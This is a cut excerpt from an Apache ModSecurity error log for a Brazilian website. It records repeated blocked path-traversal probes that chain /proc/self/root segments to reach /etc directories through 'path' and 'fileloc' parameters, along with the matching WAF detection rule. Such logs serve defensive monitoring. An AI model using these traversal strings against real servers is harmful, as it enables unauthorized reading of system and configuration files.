"PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4kRcIZFNFgEhGGCRD3QAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:57.856941 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:43880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4lMdf6f5d65gmYZRr2QAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:59.201286 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:33628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4lwkwaGbbGflqUZCwbQAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:00.789839 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:33632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4mMdf6f5d65gmYZRr6QAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:02.374103 2026] [:error] [pid 18211:tid 140411624429312] [client 74.7.241.31:33648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4mhcIZFNFgEhGGCRD4QAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:03.878260 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:33660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4mwkwaGbbGflqUZCwdQAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:13.165956 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49222] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:58:14.619727 2026] [:error] [pid 25836:tid 140411649607424] [client 74.7.241.31:35748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4poh-PF_25v4hFRCX1QAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:16.290974 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.241.31:35764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4qOw_le52K8_3pV15UgAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:18.263210 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:46838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4quyqAr6etmhZHNpT2wAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:20.243146 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:46850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4rOyqAr6etmhZHNpT3AAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:20.395606 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:41004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4rMdf6f5d65gmYZRsAQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:58:21.734942 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:46864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4rcdf6f5d65gmYZRsAgAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:23.333492 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:46876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4r9Y0UrI5A3LftIwsGwAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:24.579419 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:46876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4sNY0UrI5A3LftIwsHAAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:26.543461 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:46892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4sgkwaGbbGflqUZCwewAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:28.599314 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.241.31:52970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4tOw_le52K8_3pV15UwAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:29.784025 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.244.43:39900] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn4tdY0UrI5A3LftIwsHwAAAY0"]
[Tue Mar 17 21:58:30.315503 2026] [:error] [pid 18211:tid 140411658000128] [client 74.7.241.31:52972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4thcIZFNFgEhGGCRD6gAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:31.900552 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:52978] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4t8df6f5d65gmYZRsBwAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:33.547429 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:52980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4uda6ubjKNq_cu4YzPAAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:35.051841 2026] [:error] [pid 17972:tid 140411540502272] [client 74.7.241.31:52988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4u4Z5-GlpYjVrXCriIwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:36.058558 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49886] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:58:36.651758 2026] [:error] [pid 18211:tid 140411540502272] [client 74.7.241.31:52990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4vBcIZFNFgEhGGCRD7AAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:38.296483 2026] [:error] [pid 25836:tid 140411699963648] [client 74.7.241.31:57546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4voh-PF_25v4hFRCX2QAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
